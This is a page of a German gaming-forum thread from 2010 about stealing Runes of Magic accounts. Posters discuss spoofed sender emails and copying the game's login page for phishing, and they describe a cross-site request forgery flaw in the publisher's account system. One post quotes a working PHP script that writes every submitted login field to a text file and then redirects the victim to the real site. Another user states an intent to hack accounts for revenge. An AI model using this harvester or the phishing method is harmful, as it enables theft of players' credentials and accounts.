ROM Account hacken

Page 5 of 6

06/28/2010 17:36 Atheuz#61

Quote:

Originally Posted by metinric

danke f�r die info m�dels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach w�r dann helft dochmal frogster den server sicher zu machen.^^

Frogster interessiert sich daf�r nicht, die leiten auch sowas nicht weiter an Ihre Webentwickler.

Man kann �brigens auch emails von z.B [Only registered and activated users can see links. Click Here To Register...] verschicken (Allerdings nicht bekommen), da muss man sich nicht irgendwo eine fake email anlegen. Der einzigste Unterschied ist dann das der Header nat�rlich komplett anderster w�re als wie bei der von Frogster.

06/29/2010 12:00 Fir3andIc3#62

Quote:

Originally Posted by Atheuz

Frogster interessiert sich daf�r nicht, die leiten auch sowas nicht weiter an Ihre Webentwickler.

Man kann �brigens auch emails von z.B [Only registered and activated users can see links. Click Here To Register...] verschicken (Allerdings nicht bekommen), da muss man sich nicht irgendwo eine fake email anlegen. Der einzigste Unterschied ist dann das der Header nat�rlich komplett anderster w�re als wie bei der von Frogster.

Man kann aber von [Only registered and activated users can see links. Click Here To Register...] und als empfenger Adresse eine real angeben.. f�llt nicht sofort auf^^

06/29/2010 14:24 Atheuz#63

Quote:

Originally Posted by Fir3andIc3

Man kann aber von [Only registered and activated users can see links. Click Here To Register...] und als empfenger Adresse eine real angeben.. f�llt nicht sofort auf^^

Wieso sollte man das aber machen? Man baut eine Phising form in die Email ein oder verlinkt auf eine Website, dass geht schneller und der Empf�nger wird auch nicht so schnell misstrauisch als wenn man schreiben w�rde "Blabla schicken Sie uns Ihren Login �ber folgende Email [Only registered and activated users can see links. Click Here To Register...]"
lol'd.

06/29/2010 14:29 anonymous-f4h279#64

Quote:

Originally Posted by Atheuz

Wieso sollte man das aber machen? Man baut eine Phising form in die Email ein oder verlinkt auf eine Website, dass geht schneller und der Empf�nger wird auch nicht so schnell misstrauisch als wenn man schreiben w�rde "Blabla schicken Sie uns Ihren Login �ber folgende Email [Only registered and activated users can see links. Click Here To Register...]"
lol'd.

Das Template von RoM irgendwie bekommen, auf Webspace hauen.
2 Textboxen 1 Button und wenn man was eingibt und auf Login klickt sollen die Daten an eine Email gesendet werden.

W�re m�glich, aber wie soll man an das Template kommen.

06/29/2010 14:34 ivits#65

Quote:

Originally Posted by Digital Shadow

Das ist doch ein einfacher Phishing-Versuch. Nichts spezielles mit Cookies abfangen oder so ;)

Hier der Inhalt der post.php

PHP Code:

<?php header ('Location: http://www.runesofmagic.com'); $handle = fopen("usernames.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>

Das ist aber billigstes PHP.

Bei der schwereren Variante ist mir nicht so ganz klar wie das gehen soll. Wenn ihr sagt, dass man auf keine seite geleitet wird und durch ein cookie seine daten ver�ndert werden. Dazu m�sste man ja auf der Yoshu seite die �nderung vornehmen.
w�re es nicht einfacher, ein einen link auf eine seite zu machen, wo n cookie vom opfer automatisch aufgenommen wird, und dann die daten bei der eingabe speichert.

Spoiler

hab mal den quelltext genommen fehlen nur die css.

06/29/2010 14:44 Atheuz#66

Quote:

Originally Posted by Drewfire

Das Template von RoM irgendwie bekommen, auf Webspace hauen.
2 Textboxen 1 Button und wenn man was eingibt und auf Login klickt sollen die Daten an eine Email gesendet werden.

W�re m�glich, aber wie soll man an das Template kommen.

Datei->Seite Speichern. :P

Quote:

Originally Posted by ivits

Das ist aber billigstes PHP.

Bei der schwereren Variante ist mir nicht so ganz klar wie das gehen soll. Wenn ihr sagt, dass man auf keine seite geleitet wird und durch ein cookie seine daten ver�ndert werden. Dazu m�sste man ja auf der Yoshu seite die �nderung vornehmen.
w�re es nicht einfacher, ein einen link auf eine seite zu machen, wo n cookie vom opfer automatisch aufgenommen wird, und dann die daten bei der eingabe speichert.

Das geht so nicht, wenn es gehen w�rde w�ren Browser die unsicherste Software zum Internet surfen. Man kann deswegen nur Cookies abfragen bzw auch speichern die nur von der eigenen Seite kommen (Da der Browser nur die zu der Webseite geh�rigen Cookies an den Request anh�ngt), dass hei�t man br�uchte erstmal eine XXS Schnittstelle um wenigstens Javascript injezieren zu k�nnen.

06/29/2010 15:43 Emblionvirus#67

Quote:

Originally Posted by Viviphyd

@Emblionvirus

Dieser "Diamanten-Hack" ist kein Hack sondern schlicht und einfach ein Keylogger (und btw der Grund wieso dein Account gehackt worden ist), sowas wie einen Diamanten oder Gold-Hack gibt und wird es nie geben.

Genauso wenig kannst du erwarten das es irgendein Kiddie-Script gibt das dir wie durch Magie tausende Accounts zufliegen l�sst, auch wenn du es vielleicht nicht glaubst aber Hacken ist mit harter Arbeit und Fachwissen verbunden.

Au�erdem will ich meine pers�nliche Meinung dazu sagen und zwar das jemanden Hacken aus "Rache" kein sch�ner Grund ist. Die meisten von uns hacken, botten und cheaten weil wir a) es k�nnen oder b) uns das Leben erleichtern wollen. Trotzdem hei�t das nicht das wir wie die Irren durch die Gegend herumlaufen und denn Account von jedem der uns �ber den Weg l�uft berauben nur weil wir es k�nnen, ein bisschen Moral sollte man da schon haben. Noch dazu kommt dass das Hacken eines Accounts Diebstahl gleich kommt und auch genauso hart geahndet werden kann.

Nur weil dir im RL 5 Euro verloren gehen klaust du doch auch nicht gleich einem wild Fremden 100 Euro oder?

Ich w�re froh du hast recht mit dem RL 5 Euro,ich habe viel mehr reingesteckt und aus Rache mache ich es ja... sowas lass ich mir nicht entgehen,ich setz RL Geld f�rs spiel rein und NIEMAND unternimmt was dagegen,Moral habe ich schon! mein ACC wird gehackt? Das ist nichtso wie du dir es vorstellst!!Ich kann auch deine Meinung anchvollziehen.. das ihr Mehr Fachwissen was die Hacks betrifft habt... aber alleine das war mir zuviel... du wirst mich noch verstehen Vivi... :mad::mad:

06/29/2010 16:09 Deset#68

Quote:

Originally Posted by Emblionvirus

I du wirst mich noch verstehen Vivi... :mad::mad:

drohung?

Bedenke wie du dich gef�hlt hast als dir dein Acc genommen wurde!
Und nun sag mir w�rdest du es in Kauf nehmen, dass ein komplett unbeteiligter genau das selbe f�hlt?

Wenn du schon hackst, nimm nur das Geld runter, aber lass den acc stehen ;)

06/30/2010 15:01 Digital Shadow#69

Danke Atheuz. Die Server werden bald bestimmt wieder um einiges sicherer ;)

[Only registered and activated users can see links. Click Here To Register...]

Quote:

Originally Posted by Account Hacking unsere Schuld? Hier der GEGENBEWEIS!!!, Walterbauer

Ich wei� gerade nicht ob ich jetzt weinen oder lachen soll ...

Als mein Acc vor ein paar Wochen gehackt wurde,
bekam ich vor paar Tagen auch die Antwort vom Support, das es wohl meine Schuld sei, weil ich ja ganz sicher nen infizierten PC habe und jedem dahergelaufenen meine Acc Daten weiter gebe .... ! Ne ist Klar!

Das hat mich sooo sauer gemacht das ich mich etwas schlauer �ber das Thema gemacht hab. Was ich dann rausgefunden habe ...?
Programmieren hier wirklich nur irgendwelche Kinder???

Zuerst dachte ich daran, die Methode detailliert an den Support zu schicken das sowas nimmer passiert, nachdem
mir der Support ja so sehr weitergeholfen hat (achtung Ironie!!!) - Doch ich kam zu dem Entschluss das hier jeder wissen soll, auf welchem hei�en Eisen er sitzt und das sich KEINER mit der Supportmail abfinden soll ... Erst die Klartext Geschichte, jetzt das ....

Jedenfalls ist es �ber die Website und die dazugeh�rigen Cookies machbar die gesamten Accountdaten eines Users zu �ndern!

Es kann lediglich keine spezifische Person sein die gehackt werden soll, denn jeniger muss sicher vorher einmal auf dem Yusho System angemeldet haben und darf den Browser danach nicht schliessen (damit der Cookie bestehen bleibt - Es sei denn diese werden permanent gespeichert)

Gleich vorweg - Ich werde keine Step to Step Anleitung posten oder nen Link rausgeben wo das genauer steht - An die, die mich gleich anschreiben werden, weil sie sich bereichern wollen!
Dieser Post dient nur dazu ALLE zu warnen das der eigene Account HIER ganz sicher net sicher ist!

Ladet nur alle flei�ig weiter eure Dias auf um Kost�me f�r die verbuggten Hausm�dchen zu kaufen!!!!

Jaja Fr�sche aber niemals Fehler zugeben ....

Um meine Stellung zu verdeutlichen, hier ein Beispiel :

User X loggt sich im Yusho Account System ein um seine Dias aufzuladen, er l�sst den Browser offen (das Fenster kann ruhig geschlossen werden), geht irgendwann dann mit dieser Browser Session aufs Forum, dort schickt man ihm einen Link, wodurch man durch einen forward in dem Link einen Request an den Server mit den neuen Daten sendet, der Server akzeptiert sie!

Resultat : Man hat die GANZEN Userdaten also Username, Passwort, Email ge�ndert!!! Und et voila aber WIR sind ja schuld! Stimmt sollten keine Dias mehr laden, dann passiert das auch nimmer!

Und da liegt der PFUSCH begraben!!! Normalerweise sollte man davon ausgehen, das ein Server wo so viele sensible Daten sind, sicher eingerichtet ist. PUSTEKUCHEN!
Denn ein vern�nftig eingerichteter Server wei�t Requests von anderen Servern ab, DIESER hier tut es nicht, es ist ihm Latte ob der Server [Only registered and activated users can see links. Click Here To Register...] oder [Only registered and activated users can see links. Click Here To Register...] ist!!
Jeder kann also mit ein bisschen PHP Kentnissen die kompletten Daten eines Users �ndern unter obriger Vorraussetzung!

Und das ganze funktioniert sogar unter SSL - Gro�es Kino!

ICH SAGE ES NOCHMAL WER SICH JETZT NOCH IM YUSHO SYSTEM EINLOGGT IST SELBST SCHULD!!!

EPICFAIL!

06/30/2010 15:48 Fir3andIc3#70

Ja das war sehr Sinnvoll �� Das ist einer der Gr�nde warum es das UG gibt ^^

06/30/2010 18:54 wolleboiii#71

wenn er das wirklich von hier hat.. naja pech :D

aber ganz ehrlich... hier wurde es auch nich step by step erkl�rt... und frogster w�rde mich �berraschen wenn die sich mal die zeit/m�he evt sogar kosten machen w�rde damit ihr game/server besser/sicherer laufen... :>

btw. schade das es nicht ein �hnliches free 2 play mmo gibt wie runes.. nur halt funktionierend und weniger selbstzerst�rend (kleiner wink zu den noob patches :>)

06/30/2010 19:42 Atheuz#72

Quote:

Originally Posted by Digital Shadow

Danke Atheuz. Die Server werden bald bestimmt wieder um einiges sicherer ;)

[Only registered and activated users can see links. Click Here To Register...]

Soll das jetzt b�se sein? :confused: Hatte ja im ersten Post bereits gesagt das ich keine Absichten habe irgendwelche Accounts einzusacken, sondern nur mal eine der vielen L�cken aufzeige, wenn das Froggster dann behebt finde ich das auch gut so..

06/30/2010 19:46 Deset#73

Aber schaut doch isn Forum von denen...

die l�schen oder bearbeiten alle Posts die damit zu tun haben :awesome:

und wieder ein froggie fail :P

06/30/2010 21:19 Viviphyd#74

Eine Panik von der Community zu verhindern geht mir ja noch ein aber im prinzip alles zu dementieren und kein offizieles Statement dazu abzugeben find ich absolut l�cherlich, da kommt man sich ja schon fast vor wie bei der Stasi :D

Es ist wirklich lustig anzusehen wie bei jedem neuen Skandal von den Fr�schen eine Welle an zahlenden Kunden sich vom Spiel distanziert, jedoch zwei Monate sp�ter die doppelte Anzahl an potenzielen Kunden wieder dazu kommt.

Mich wunderts ja das keiner gerichtlich gegen Frogster vorgeht. Ich hab mich zwar nicht mit denn AGB vertraut gemacht, noch bin ich generell ein Profi was Rechtliches angeht aber ich bin mir ziemlich sicher das sich da was lassen macht. Immerhin wurden einigen Spielern digitale Waren im Wert von mehreren hundert Euro entwendet, wenn man da nicht rechtlich gegen Frogsters Faulheit vorgehen kann dann hat die Judikative definitiv was falsch gemacht.

Wie wolleboiii schon gesagt hat ist es wirklich Schade das es kein vergleichbares f2p-Game gibt. Ich pers�nlich bau meine Hoffnungen ja auf GW2, innovatives System, geniale Grafik und sogar einmal eine interessante Story-Line aber naja, wir werden sehen was die Zukunft so bringt, vielleicht macht es bei Frogster ja doch noch Klick, hoffentlich vor dem 21. Dezember 2012 :P

06/30/2010 21:31 Deset#75

Quote:

Originally Posted by Viviphyd

Mich wunderts ja das keiner gerichtlich gegen Frogster vorgeht. Ich hab mich zwar nicht mit denn AGB vertraut gemacht, noch bin ich generell ein Profi was Rechtliches angeht aber ich bin mir ziemlich sicher das sich da was lassen macht. Immerhin wurden einigen Spielern digitale Waren im Wert von mehreren hundert Euro entwendet, wenn man da nicht rechtlich gegen Frogsters Faulheit vorgehen kann dann hat die Judikative definitiv was falsch gemacht.

Ich habe mich schonmal bei denen durch die AGB gelesen..
ist alles nicht ganz so fest wie die sich vllt erhoffen :awesome:

Quote:

Originally Posted by Viviphyd

Ich pers�nlich bau meine Hoffnungen ja auf GW2, innovatives System, geniale Grafik und sogar einmal eine interessante Story-Line

Page 5 of 6

« First